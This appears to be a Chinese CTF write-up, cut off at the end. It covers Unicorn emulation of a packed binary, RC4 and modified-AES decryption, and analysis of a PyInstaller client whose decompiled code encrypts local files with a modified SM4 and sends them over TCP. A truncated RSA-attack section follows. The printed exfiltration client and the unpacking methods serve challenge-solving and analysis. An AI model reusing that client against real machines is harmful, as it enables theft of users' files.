packed_size = (packed_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF

mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(packed_base, packed_size)
mu.mem_write(packed_base, packed_image[: packed_pe.OPTIONAL_HEADER.SizeOfHeaders])
for packed_section in packed_pe.sections:
    raw_begin = packed_section.PointerToRawData
    packed_raw = packed_image[raw_begin : raw_begin + packed_section.SizeOfRawData]
    if packed_raw:
        mu.mem_write(packed_base + packed_section.VirtualAddress, packed_raw)

stack_base = 0x01000000
stack_size = 0x00200000
mu.mem_map(stack_base, stack_size)
# Start RSP 0x10000 below the top of the mapping.
mu.reg_write(UC_X86_REG_RSP, stack_base + stack_size - 0x10000)

# Fake API area: each stub sits 0x100 apart, starting at api_base + 0x100.
api_base = 0x03000000
mu.mem_map(api_base, 0x00020000)
api_stubs = {
    stub_name: api_base + slot * 0x100
    for slot, stub_name in enumerate(
        ("LoadLibraryA", "ExitProcess", "GetProcAddress", "VirtualProtect", "exit"),
        start=1,
    )
}
for api_stub in api_stubs.values():
    mu.mem_write(api_stub, b"\xC3")

# Point the matching import-table slots of the packed image at the stubs.
for import_entry in packed_pe.DIRECTORY_ENTRY_IMPORT:
    for import_symbol in import_entry.imports:
        if not import_symbol.name:
            continue
        import_name = import_symbol.name.decode()
        if import_name in api_stubs:
            mu.mem_write(import_symbol.address, struct.pack("<Q", api_stubs[import_name]))

# "next_fake" is the next free address for a GetProcAddress-resolved stub.
state = {"stop": False, "next_fake": api_base + 0x1000}
dll_handles: dict[str, int] = {}
symbol_addrs: dict[tuple[int, str], int] = {}
addr_to_name: dict[int, str] = {}
def _read_cstring(mu: Uc, address: int) -> str:
    """Read a NUL-terminated byte string from emulated memory, decoded as latin1."""
    collected = bytearray()
    while True:
        current = mu.mem_read(address, 1)[0]
        if current == 0:
            break
        collected.append(current)
        address += 1
    return collected.decode("latin1")


def _return_to_caller(mu: Uc, result: int) -> None:
    """Emulate `ret`: pop the return address, put ``result`` in RAX and jump back."""
    rsp = mu.reg_read(UC_X86_REG_RSP)
    ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
    mu.reg_write(UC_X86_REG_RSP, rsp + 8)
    mu.reg_write(UC_X86_REG_RAX, result)
    mu.reg_write(UC_X86_REG_RIP, ret_addr)


def on_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
    """UC_HOOK_CODE callback that stands in for the Windows APIs the stub calls.

    Stops emulation at 0x4014E0 (where the unpacking stub jumps out) and on
    ExitProcess/exit. LoadLibraryA, GetProcAddress and VirtualProtect are
    emulated by address; anything resolved through GetProcAddress gets a fake
    stub whose result is chosen by name. Arguments are read from RCX/RDX/R9,
    the Win64 register arguments.

    ``user_data`` is the shared state dict: "stop" is set on termination and
    "next_fake" is advanced for every newly resolved symbol.
    """
    if address == 0x4014E0:
        # The original printed an undefined name `stop` here (NameError).
        print("reached 0x4014E0")
        user_data["stop"] = True
        mu.emu_stop()
        return

    if address == api_stubs["LoadLibraryA"]:
        print("called LoadLibraryA")
        dll_name = _read_cstring(mu, mu.reg_read(UC_X86_REG_RCX))
        # One stable fake handle per DLL name, 0x100 apart.
        handle = dll_handles.setdefault(dll_name, api_base + 0x8000 + len(dll_handles) * 0x100)
        _return_to_caller(mu, handle)
        return

    if address == api_stubs["GetProcAddress"]:
        print("called GetProcAddress")
        handle = mu.reg_read(UC_X86_REG_RCX)
        symbol_name = _read_cstring(mu, mu.reg_read(UC_X86_REG_RDX))
        symbol_key = (handle, symbol_name)
        if symbol_key not in symbol_addrs:
            fake_addr = user_data["next_fake"]
            user_data["next_fake"] += 0x10
            symbol_addrs[symbol_key] = fake_addr
            addr_to_name[fake_addr] = symbol_name
            mu.mem_write(fake_addr, b"\xC3" * 8)
        _return_to_caller(mu, symbol_addrs[symbol_key])
        return

    if address == api_stubs["VirtualProtect"]:
        print("called VirtualProtect")
        old_protect_ptr = mu.reg_read(UC_X86_REG_R9)
        if old_protect_ptr:
            # Report 0x20 as the previous protection value.
            mu.mem_write(old_protect_ptr, struct.pack("<I", 0x20))
        _return_to_caller(mu, 1)
        return

    if address in (api_stubs["ExitProcess"], api_stubs["exit"]):
        print("called ExitProcess")
        user_data["stop"] = True
        mu.emu_stop()
        return

    # Everything below handles stubs handed out by GetProcAddress.
    fake_name = addr_to_name.get(address)
    if fake_name is None:
        return

    fake_result = 0
    if fake_name == "GetCurrentProcess":
        fake_result = 114514
    elif fake_name in {"GetCurrentProcessId", "GetCurrentThreadId", "GetTickCount"}:
        fake_result = 1
    elif fake_name == "QueryPerformanceCounter":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 1))
        fake_result = 1
    elif fake_name == "GetSystemTimeAsFileTime":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, struct.pack("<Q", 0))
    elif fake_name == "GetStartupInfoA":
        out_ptr = mu.reg_read(UC_X86_REG_RCX)
        mu.mem_write(out_ptr, b"\x00" * 0x68)
    elif fake_name == "GetModuleHandleA":
        fake_result = packed_base
    elif fake_name in {
        "VirtualQuery",
        "RtlAddFunctionTable",
        "InitializeCriticalSection",
        "DeleteCriticalSection",
        "EnterCriticalSection",
        "LeaveCriticalSection",
        "SetUnhandledExceptionFilter",
    }:
        fake_result = 1
    _return_to_caller(mu, fake_result)
mu.hook_add(UC_HOOK_CODE, on_code, state)
mu.emu_start(packed_base + packed_pe.OPTIONAL_HEADER.AddressOfEntryPoint, 0)
# Dump the unpacked loader image and carve the embedded base64 blob.
# "TVqQ..." is the base64 encoding of a PE header ("MZ\x90...").
loader_dump = bytes(mu.mem_read(packed_base, 0x15000))
blob_start = loader_dump.find(b"TVqQAAMAAAAEAAAA//8A")
print(blob_start)
if blob_start < 0:
    # Without this, the scan would start at index -1 and decode garbage.
    raise RuntimeError("base64-encoded stage2 not found in the unpacked image")
# Must be bytes: indexing a bytes object yields an int, and `int in str`
# raises TypeError.
b64_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
blob_end = blob_start
while blob_end < len(loader_dump) and loader_dump[blob_end] in b64_alphabet:
    blob_end += 1
stage2_enc = base64.b64decode(loader_dump[blob_start:blob_end])
open("out/stage2.exe", "wb").write(stage2_enc)
这里做了一次解密。
进去扫一眼大概就知道rc4了。
rc4 key 在 0x4070C0。可以直接跑,跑完就有 .mydata 和 .hello 里的内容。
import pefile
def _rc4_crypt(key: bytes, data: bytes) -> bytearray:
    """Apply standard RC4 (KSA + PRGA) with ``key`` to ``data``; return the result."""
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % len(key)]) & 0xFF
        sbox[i], sbox[j] = sbox[j], sbox[i]
    out = bytearray(data)
    i = 0
    j = 0
    for pos, byte in enumerate(out):
        i = (i + 1) & 0xFF
        j = (j + sbox[i]) & 0xFF
        sbox[i], sbox[j] = sbox[j], sbox[i]
        out[pos] = byte ^ sbox[(sbox[i] + sbox[j]) & 0xFF]
    return out


with open("out/stage2.exe", "rb") as stage2_file:
    stage2_enc = stage2_file.read()
stage2_pe = pefile.PE(data=stage2_enc)
stage2_dec = bytearray(stage2_enc)
# The 0x20-byte RC4 key is read from RVA 0x70C0.
rc4_key_offset = stage2_pe.get_offset_from_rva(0x70C0)
rc4_key = bytes(stage2_dec[rc4_key_offset : rc4_key_offset + 0x20])
# Each section is decrypted independently with a freshly initialised key schedule.
for target_name in (b".hello", b".mydata"):
    target_section = next(
        section for section in stage2_pe.sections if section.Name.rstrip(b"\0") == target_name
    )
    target_start = target_section.PointerToRawData
    target_end = target_start + target_section.SizeOfRawData
    stage2_dec[target_start:target_end] = _rc4_crypt(rc4_key, stage2_dec[target_start:target_end])
open("out/stage2_dec.exe", "wb").write(stage2_dec)
校验逻辑:0x408001–0x408020 是 AES key,0x408021–0x408030 是 IV,偏移 0x31 开始是密文。
模式是cbc。直接跑也跑不出来,应该是魔改了,但是能找到解密逻辑所以,,继续模拟执行吧。
import struct
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *
# def hook_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
# if address == 0x404d80:
# print("reached AES decrypt start")
# return
# Map the RC4-decrypted stage 2 and call its decrypt routine at 0x404d80
# directly, instead of re-implementing the modified AES.
with open("out/stage2_dec.exe", "rb") as stage2_file:
    stage2_dec = stage2_file.read()
stage2_dec_pe = pefile.PE(data=stage2_dec)
stage2_base = stage2_dec_pe.OPTIONAL_HEADER.ImageBase
stage2_size = (stage2_dec_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF

mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(stage2_base, stage2_size)
mu.mem_write(stage2_base, stage2_dec[: stage2_dec_pe.OPTIONAL_HEADER.SizeOfHeaders])
for stage2_section in stage2_dec_pe.sections:
    raw_begin = stage2_section.PointerToRawData
    stage2_raw = stage2_dec[raw_begin : raw_begin + stage2_section.SizeOfRawData]
    if stage2_raw:
        mu.mem_write(stage2_base + stage2_section.VirtualAddress, stage2_raw)

stack_base = 0x01000000
stack_size = 0x00100000
mu.mem_map(stack_base, stack_size)
stack_rsp = stack_base + stack_size - 0x4000
# Fake return address: emulation ends when the routine returns to 0xDEADBEEF.
mu.mem_write(stack_rsp, struct.pack("<Q", 0xDEADBEEF))  # ret 2 0xDEADBEEF

scratch_base = 0x02000000
mu.mem_map(scratch_base, 0x00020000)

mydata_section = next(
    section for section in stage2_dec_pe.sections if section.Name.rstrip(b"\0") == b".mydata"
)
mydata_begin = mydata_section.PointerToRawData
data = stage2_dec[mydata_begin : mydata_begin + mydata_section.SizeOfRawData]
# Layout used here: byte 0 skipped, 32-byte key, 16-byte IV, 48 bytes of ciphertext.
aes_key = data[1:33]
aes_iv = data[33:49]
ciphertext = data[49:97]

ciphertext_in = scratch_base + 0x1000
key_in = scratch_base + 0x2000
iv_in = scratch_base + 0x3000
plaintext_out = scratch_base + 0x5000
for buffer_addr, blob in ((ciphertext_in, ciphertext), (key_in, aes_key), (iv_in, aes_iv)):
    mu.mem_write(buffer_addr, blob)

# Win64 call: four arguments in RCX/RDX/R8/R9, the fifth on the stack at
# rsp+0x28 (above the return address and the 0x20-byte shadow space).
mu.mem_write(stack_rsp + 0x28, struct.pack("<Q", plaintext_out))
mu.reg_write(UC_X86_REG_RSP, stack_rsp)
for register, value in (
    (UC_X86_REG_RCX, ciphertext_in),
    (UC_X86_REG_RDX, len(ciphertext)),
    (UC_X86_REG_R8, key_in),
    (UC_X86_REG_R9, iv_in),
):
    mu.reg_write(register, value)
mu.emu_start(0x404d80, 0xDEADBEEF)  # run to 0xDEADBEEF
plaintext = bytes(mu.mem_read(plaintext_out, len(ciphertext)))
print(plaintext.decode())
re3
pyinstaller,直接拆。拆出来pyc丢给pylingual。
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'client.py'
# Bytecode version: 3.10.b1 (3439)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)
import base64
import sys
import os
import json
import socket
import hashlib
import crypt_core
import builtins
def _oe(_d, _k1, _k2, _rn):
# ***<module>._oe: Failure: Compilation Error
try:
_b = base64.b85decode(_d.encode())
_r = []
for _i, _x in enumerate(_b):
return ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn), _i, 3) or ((_k1, _k2, _rn),
_r.append(_x, _k if _k else None)
_s = bytes(_r).decode()
_res = []
for _c in _s:
if _c.isalpha():
_base = ord('A') if _c.isupper() else ord('a')
_res.append((chr, ord(_c), _base, _rn, 26, _base))
else:
if _c.isdigit():
_res.append(str(int(_c), _rn or 10))
else:
_res.append(_c)
return ''.join(_res)
except:
return _d
_globs = dict(__name__='__main__', __file__=__file__, __package__=None, _oe=_oe)
for _k in dir(builtins):
if not _k.startswith('_'):
_globs[_k] = getattr(builtins, _k)
_globs['base64'] = base64
_globs['sys'] = sys
_globs['os'] = os
_globs['json'] = json
_globs['socket'] = socket
_globs['hashlib'] = hashlib
_globs['crypt_core'] = crypt_core
def _obf_check():
if hasattr(sys, 'gettrace'):
_tr = sys.gettrace()
if _tr is not None:
return False
return True
def _obf_exec(_code):
# ***<module>._obf_exec: Failure: Different bytecode
if not _obf_check():
return None
else:
exec(compile, _code, chr(60) | chr(111) | chr(98) | chr(102) | chr(101) | chr(120) | chr(99))
_1667 = 'xxxxx'
_obf_exec(base64.b85decode(_1667).decode())
再拆
_j0 = lambda: (30 ^ 126) + (520 % 26)
_j1 = lambda: (158 ^ 184) + (820 % 54)
_j2 = lambda: (37 ^ 2) + (687 % 25)
_j3 = lambda: (72 ^ 112) + (474 % 30)
_j4 = lambda: (173 ^ 82) + (257 % 73)
_j5 = lambda: (117 ^ 203) + (331 % 54)
_j6 = lambda: (242 ^ 46) + (846 % 33)
_j7 = lambda: (21 ^ 148) + (425 % 77)
_j8 = lambda: (139 ^ 134) + (427 % 21)
_j9 = lambda: (245 ^ 62) + (413 % 85)
_j10 = lambda: (242 ^ 65) + (892 % 30)
_j11 = lambda: (22 ^ 58) + (740 % 59)
_j12 = lambda: (139 ^ 248) + (771 % 74)
_j13 = lambda: (219 ^ 230) + (262 % 63)
_j14 = lambda: (17 ^ 89) + (622 % 38)
_j15 = lambda: (229 ^ 205) + (369 % 25)
_j16 = lambda: (111 ^ 33) + (433 % 50)
_j17 = lambda: (41 ^ 142) + (512 % 21)
class _Obf3776:
def __init__(self):
self._v = 751
def _m(self):
return self._v * 5
#!/usr/bin/env python3
import socket
import json
import os
import sys
import hashlib
import time
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import crypt_core
class CustomBase64:
    """Base64 variant that swaps the standard alphabet for a custom one.

    Both alphabets are stored as ``_oe``-encoded strings and decoded when the
    class body runs.
    """

    CUSTOM_ALPHABET = _oe("8<<BLok1UrR}_R>27yTmms1djUI&{(7Ls{Apm;c@eJQYZA-rTHu4po}aw559KBaUw?kHpDBVghrW#KRr", 83, 214, 17)
    STANDARD_ALPHABET = (
        _oe("0fj{dfJO_COA?e)7n4^Mo>&>3T^^WT1BYWEqGTnZX)3I6F|~Czuy#AYdpNp$J-J~b;VEk7AYtVtX5cz}", 83, 214, 17)
    )
    # Character-for-character translation tables between the two alphabets.
    ENCODE_TABLE = str.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)
    DECODE_TABLE = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)

    @classmethod
    def decode(cls, data: str) -> bytes:
        """Map ``data`` back to the standard alphabet, then Base64-decode it."""
        import base64
        std_b64 = data.translate(cls.DECODE_TABLE)
        return base64.b64decode(std_b64)
# Module-level host; main() does not read it and takes its host from _get_server_host().
SERVER_HOST = ""
# TCP port that main() connects to.
SERVER_PORT = 9999
# Key material: an _oe-encoded string, decoded once more with the custom Base64 alphabet.
KEY_B64 = _oe("C7MAupdc5tRBM!52kv4Wmp~Hle`A4N5`t?5nObY+L~6Pz5wdF*y=E$zQv!xZ", 83, 214, 17)
KEY = CustomBase64.decode(KEY_B64)
# Paths (stored _oe-encoded) that main() reads and sends one by one.
FILES_TO_SEND = [_oe("I-p}FvS)q0emD", 83, 214, 17), _oe("B(-BJ_<B6O", 83, 214, 17), _oe("C$MxRtZ99{emD", 83, 214, 17)]
def _opaque_true():
    """Opaque predicate: always returns True.

    ``_i * (_i - _i + 1)`` is just ``_i``, so the sum over range(100) is
    4950 and the final comparison cannot fail.
    """
    _x = 0
    for _i in range(100):
        _x += _i * (_i - _i + 1)
    return _x >= 0
def _opaque_false():
    """Opaque predicate: always returns False (35 is never equal to 36)."""
    _a, _b = 5, 7
    return (_a * _b) == (_b * _a + 1)
def _dead_calc():
    """Filler computation with no side effects; always returns 1.

    The running value is reduced modulo 17 at every step, so the ``> 100``
    branch can never fire.
    """
    _dead = 0
    for _i in range(50):
        _dead = (_dead + _i) % 17
        if _dead > 100:
            _dead = _dead * 2 + 1
    return _dead
def encrypt_file(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt ``plaintext`` via ``crypt_core.encode_data`` with ``key[:16]``.

    Written as a flattened state machine: because ``_opaque_true()`` always
    holds and ``_opaque_false()`` never does, the only path taken is
    state 0 -> state 2 -> exit, returning the ``encode_data`` result.
    """
    _state = 0
    _result = None
    while _state < 3:
        if _state == 0:
            if _opaque_true():
                # Only the first 16 bytes of the key are passed on.
                _result = crypt_core.encode_data(plaintext, key[:16])
                _state = 2
            else:
                _dead_calc()
                _state = 1
        elif _state == 1:
            _dead_calc()
            _state = 2
        elif _state == 2:
            if _opaque_false():
                _result = None
            _state = 3
    return _result
def send_single_file(sock, filename, plaintext):
    """Encrypt ``plaintext`` and send it over ``sock`` as one JSON line.

    The payload is a two-key dict (key names are ``_oe``-encoded) holding
    ``filename`` and the hex-encoded ciphertext, followed by ``b"\\n"``.
    After sending, the function sleeps for 0.1 s. States 3 and the ``else``
    branches are dead code guarded by opaque predicates.
    """
    _s = 0
    _ct = None
    _pl = None
    while _s < 5:
        if _s == 0:
            _ct = encrypt_file(KEY, plaintext)
            _s = 1
        elif _s == 1:
            _pl = {_oe("B&>2Jvtu`)", 83, 214, 17): filename, _oe("C#-fVpm;c-emD", 83, 214, 17): _ct.hex()}
            _s = 2
        elif _s == 2:
            if _opaque_true():
                sock.sendall(json.dumps(_pl).encode(_oe("KfPvt;{", 83, 214, 17)) + b"\n")
                _s = 4
            else:
                _dead_calc()
                _s = 3
        elif _s == 3:
            _dead_calc()
            _s = 4
        elif _s == 4:
            if not _opaque_false():
                time.sleep(0.1)
            _s = 5
def _verify_cmd(cmd):
    """Return True only when the MD5 hex digest of ``cmd`` matches the stored one.

    An empty ``cmd`` is rejected immediately. The expected digest is kept as
    an ``_oe``-encoded string. State 49 is the common "reject" exit.
    """
    _state = 10
    _hash_val = None
    _valid = False
    while _state < 50:
        if _state == 10:
            if len(cmd) > 0:
                _state = 20
            else:
                _state = 49
        elif _state == 20:
            _hash_val = hashlib.md5(cmd.encode()).hexdigest()
            _state = 30
        elif _state == 30:
            if _opaque_true():
                _valid = _hash_val == _oe("VWK4=qGuqYBxK?sVWlBw<RW0^B4q9&VB;re<0L2U", 83, 214, 17)
                _state = 40
            else:
                _dead_calc()
                _state = 49
        elif _state == 40:
            if _valid:
                _state = 50
            else:
                _state = 49
        elif _state == 49:
            return False
    return _valid
def _get_server_host(args):
    """Return ``args[2]`` when present, otherwise the empty string.

    The ``_s == 200`` branch can never run: the loop condition ``_s < 200``
    ends the loop as soon as that state is reached, so the ``_oe``-encoded
    host in it is never used.
    """
    _s = 100
    _host = None
    while _s < 200:
        if _s == 100:
            if len(args) > 2:
                _s = 110
            else:
                _s = 120
        elif _s == 110:
            _host = args[2]
            _s = 200
        elif _s == 120:
            if _opaque_true():
                _host = ""
            _s = 200
        elif _s == 200:
            if _opaque_false():
                _host = _oe("Ywsm};Xh>fDF", 83, 214, 17)
            _s = 201
    return _host
def main():
    """Client entry point, written as a flattened state machine.

    Flow: require ``sys.argv[1]`` and validate it with ``_verify_cmd``;
    print a banner; open a TCP socket and connect to
    ``(_get_server_host(sys.argv), SERVER_PORT)``; for each path in
    ``FILES_TO_SEND`` that exists, read it and pass it to
    ``send_single_file``; finally sleep 0.2 s and close the socket.

    NOTE(review): when ``connect`` fails the code jumps straight to state 99,
    so the socket created in state 10 is not closed on that path.
    """
    _state = 0
    _sock = None
    _idx = 0
    _printed_header = False
    while _state < 100:
        if _state == 0:
            # Dead branch: _opaque_false() never holds.
            if _opaque_false():
                print(_oe("2B2dm_GLArX8", 83, 214, 17))
            _state = 1
        elif _state == 1:
            if len(sys.argv) < 2:
                _state = 5
            else:
                _state = 2
        elif _state == 2:
            if _verify_cmd(sys.argv[1]):
                _state = 3
            else:
                _state = 4
        elif _state == 3:
            if not _printed_header:
                print("=" * 50)
                print(_oe("8K7l9zh`rSYcQZO7{6mSyk;f8F$cA4C9`^SyD5F)", 83, 214, 17))
                print("=" * 50)
                _printed_header = True
            _state = 10
        elif _state == 4:
            print("错误:无效的命令")
            _state = 99
        elif _state == 5:
            print("用法:python client.py <command> [SERVER_HOST]")
            _state = 99
        elif _state == 10:
            try:
                _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                _state = 11
            except Exception:
                _state = 99
        elif _state == 11:
            _host = _get_server_host(sys.argv)
            _state = 12
        elif _state == 12:
            try:
                _sock.connect((_host, SERVER_PORT))
                _state = 20
            except Exception as e:
                print(f"[!] 连接失败:{e}")
                _state = 99
        elif _state == 20:
            # Loop head over FILES_TO_SEND.
            if _idx < len(FILES_TO_SEND):
                _state = 21
            else:
                _state = 30
        elif _state == 21:
            _fname = FILES_TO_SEND[_idx]
            _state = 22
        elif _state == 22:
            if os.path.exists(_fname):
                _state = 23
            else:
                _state = 28
        elif _state == 23:
            with open(_fname, "rb") as _f:
                _data = _f.read()
            _state = 24
        elif _state == 24:
            if _opaque_true():
                print(f"[*] 发送文件")
            _state = 25
        elif _state == 25:
            if not _opaque_false():
                send_single_file(_sock, _fname, _data)
            _state = 26
        elif _state == 26:
            _idx += 1
            _state = 20
        elif _state == 28:
            print(f"[-] 文件不存在")
            _state = 29
        elif _state == 29:
            _idx += 1
            _state = 20
        elif _state == 30:
            if _opaque_true():
                time.sleep(0.2)
            _state = 31
        elif _state == 31:
            if _sock:
                _sock.close()
            _state = 99
        elif _state == 99:
            break
# Script entry guard; the compared string is stored _oe-encoded.
if __name__ == _oe("42g9itaJ>C", 83, 214, 17):
    _dead_calc()
    # _opaque_true() always holds, so main() is always the branch taken.
    if _opaque_true():
        main()
    else:
        _dead_calc()
主要问题是crypt_core.so。暴露出来只有个encode_data的接口。
拖进 IDA 看一眼,搜索后发现看起来是魔改的 SM4。表是在运行时才初始化的,分别位于 0xDB80、0xDB00、0xDBA0。
可以读到:
import ctypes
import sys
class PyMethodDef(ctypes.Structure):
    """ctypes mirror of CPython's ``PyMethodDef`` record.

    All pointers are declared as ``c_void_p`` so they read back as plain
    integer addresses.
    """

    _fields_ = [
        ("ml_name", ctypes.c_void_p),
        ("ml_meth", ctypes.c_void_p),  # address of the C implementation
        ("ml_flags", ctypes.c_int),
        ("ml_doc", ctypes.c_void_p),
    ]
class CyFuncObject(ctypes.Structure):
    """ctypes view of the ``PyCFunctionObject`` header of a builtin/Cython function.

    Only ``m_ml`` is needed to reach the C entry point. ``m_weakreflist``
    is included because CPython places it between ``m_module`` and
    ``vectorcall``; without it the two trailing fields would be read from
    the wrong offsets.
    """

    _fields_ = [
        ("ob_refcnt", ctypes.c_ssize_t),
        ("ob_type", ctypes.c_void_p),
        ("m_ml", ctypes.POINTER(PyMethodDef)),
        ("m_self", ctypes.c_void_p),
        ("m_module", ctypes.c_void_p),
        ("m_weakreflist", ctypes.c_void_p),
        ("vectorcall", ctypes.c_void_p),
        ("mm_class", ctypes.c_void_p),
    ]
sys.path.insert(0, "/Users/libr/Desktop/CTF/1/pyi_extract")
import crypt_core

# Reinterpret the function object in place to reach its C entry point.
obj = CyFuncObject.from_address(id(crypt_core.encode_data))
entry = obj.m_ml.contents.ml_meth
# 0x9820 is presumably the offset of that entry point inside crypt_core.so
# (as seen in IDA), which gives the module's load base - confirm.
base = entry - 0x9820
# Tables are read after import, i.e. after the module has initialised them.
# Upper-case names match what the cipher code below reads.
DB80 = ctypes.string_at(base + 0xDB80, 16)
DB00 = ctypes.string_at(base + 0xDB00, 128)
DBA0 = ctypes.string_at(base + 0xDBA0, 256)
然后再写个反向操作
# 16-byte cipher key; presumably the client's KEY_B64 after CustomBase64
# decoding, truncated to the key[:16] that encrypt_file passes on - confirm.
KEY = b"passvkcDKWLAA45o"
def rotl32(value, shift):
    """Rotate the 32-bit word ``value`` left by ``shift`` bits (0 <= shift <= 32)."""
    return ((value << shift) | (value >> (32 - shift))) & 0xFFFFFFFF
def tau(value):
    """Substitute each of the four bytes of ``value`` through the ``DBA0`` table."""
    return (
        DBA0[(value >> 24) & 0xFF] << 24
        | DBA0[(value >> 16) & 0xFF] << 16
        | DBA0[(value >> 8) & 0xFF] << 8
        | DBA0[value & 0xFF]
    )
def l_transform(value):
    """Linear diffusion for the data rounds: XOR of ``value`` rotated left by 0, 2, 10, 18 and 24."""
    return value ^ rotl32(value, 2) ^ rotl32(value, 10) ^ rotl32(value, 18) ^ rotl32(value, 24)
def l_prime_transform(value):
    """Linear diffusion for the key schedule: XOR of ``value`` rotated left by 0, 13 and 23."""
    return value ^ rotl32(value, 13) ^ rotl32(value, 23)
def chunk_words(data, endian):
    """Split ``data`` into consecutive 4-byte groups and return them as integers.

    ``endian`` is the byte order passed to ``int.from_bytes`` ("big" or
    "little"). A trailing group shorter than 4 bytes is converted as-is.
    """
    return [
        int.from_bytes(data[offset:offset + 4], endian)
        for offset in range(0, len(data), 4)
    ]
def pad_pkcs7(data):
    """Append PKCS#7 padding so that ``len(result)`` is a multiple of 16.

    ``16 - len % 16`` is always in 1..16, so block-aligned input gets a full
    extra block and no special case is needed.
    """
    pad = 16 - (len(data) % 16)
    return data + bytes([pad]) * pad
def unpad_pkcs7(data):
    """Strip and validate PKCS#7 padding for a 16-byte block size.

    Raises:
        ValueError: if ``data`` is empty, the pad length is outside 1..16,
            or the trailing bytes are not ``pad`` copies of ``pad``.
    """
    if not data:
        raise ValueError("empty data")
    pad = data[-1]
    if pad < 1 or pad > 16:
        raise ValueError("bad padding length")
    # Also rejects inputs shorter than `pad`, since the slice lengths differ.
    if data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding bytes")
    return data[:-pad]
def expand_round_keys(key, fk_endian, ck_endian):
    """Derive the 24 round keys from a 16-byte ``key``.

    ``key`` is read as four big-endian words and XORed with the ``DB80``
    words; the ``DB00`` words act as per-round constants. ``fk_endian`` and
    ``ck_endian`` select the byte order used to read those two tables.
    NOTE(review): 24 rounds are generated here, whereas standard SM4 uses
    32 - presumably part of the modification; confirm against the binary.
    """
    mk = chunk_words(key, "big")
    fk = chunk_words(DB80, fk_endian)
    ck = chunk_words(DB00, ck_endian)
    state = [mk[i] ^ fk[i] for i in range(4)]
    rks = []
    for index in range(24):
        value = state[index + 1] ^ state[index + 2] ^ state[index + 3] ^ ck[index]
        value = l_prime_transform(tau(value))
        rk = state[index] ^ value
        state.append(rk)
        rks.append(rk)
    return rks
def encrypt_block(block, rks, block_endian):
    """Run one 16-byte ``block`` through the rounds defined by ``rks``.

    Each round appends ``x[-4] ^ L(tau(x[-3] ^ x[-2] ^ x[-1] ^ rk))`` to the
    word list; the output is the last four words in reverse order,
    serialised with ``block_endian``.
    """
    x = chunk_words(block, block_endian)
    for rk in rks:
        value = x[-3] ^ x[-2] ^ x[-1] ^ rk
        x.append(x[-4] ^ l_transform(tau(value)))
    out = x[-1], x[-2], x[-3], x[-4]
    return b"".join(word.to_bytes(4, block_endian) for word in out)
def decrypt_block(block, rks, block_endian):
    """Decrypt one block by running ``encrypt_block`` with the round keys reversed."""
    return encrypt_block(block, list(reversed(rks)), block_endian)
def encrypt_ecb(data, rks, block_endian):
    """PKCS#7-pad ``data`` and encrypt it block by block (ECB)."""
    padded = pad_pkcs7(data)
    out = bytearray()
    for offset in range(0, len(padded), 16):
        out.extend(encrypt_block(padded[offset:offset + 16], rks, block_endian))
    return bytes(out)
def decrypt_ecb(data, rks, block_endian):
    """Decrypt ECB ciphertext block by block and strip the PKCS#7 padding.

    Raises:
        ValueError: if ``data`` is not a multiple of 16 bytes, or the
            padding check in ``unpad_pkcs7`` fails.
    """
    if len(data) % 16 != 0:
        raise ValueError("ciphertext is not block aligned")
    out = bytearray()
    for offset in range(0, len(data), 16):
        out.extend(decrypt_block(data[offset:offset + 16], rks, block_endian))
    return unpad_pkcs7(bytes(out))
最后
import json
# 1.json is presumably a Wireshark/tshark JSON export of the capture
# (the "_source" / "layers" / "data.data" keys suggest so) - confirm.
with open("./1.json", "r", encoding="utf-8") as handle:
    packets = json.load(handle)
KEY = b"passvkcDKWLAA45o"
rks = expand_round_keys(KEY, "little", "little")
for p in packets:
    layers = p["_source"]["layers"]
    # Skip packets that carry no payload.
    if "data" not in layers:
        continue
    # "data.data" is colon-separated hex; each payload is one JSON object.
    payload_hex = layers["data"]["data.data"].replace(":", "")
    payload = bytes.fromhex(payload_hex)
    row = json.loads(payload)
    print(row)
    ciphertext = bytes.fromhex(row["ciphertext"])
    plaintext = decrypt_ecb(ciphertext, rks, "big")
    print(plaintext.decode("utf-8", errors="replace"))
crypto
rsa
level1
Given 20 PEM public keys, a pairwise GCD brute force shows that keys (1, 2) and keys (4, 15) each share a prime factor,
and keys 6, 12 and 17 can be factored with Wiener's attack (small d).
The plaintext is then recovered with CRT.
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util.number import long_to_bytes
from math import gcd, isqrt
from pathlib import Path
def wiener_attack(n, e):
    """Try to factor ``n`` with Wiener's small-private-exponent attack.

    Walks the convergents ``k/d`` of ``e/n``; for each one that makes
    ``(e*d - 1) / k`` an integer, treats that value as phi(n) and solves
    ``x^2 - (n - phi + 1) x + n = 0`` for the factors.

    Returns:
        ``(d, p, q)`` with ``p * q == n`` on success, otherwise ``None``.
    """
    def continued_fraction(num, den):
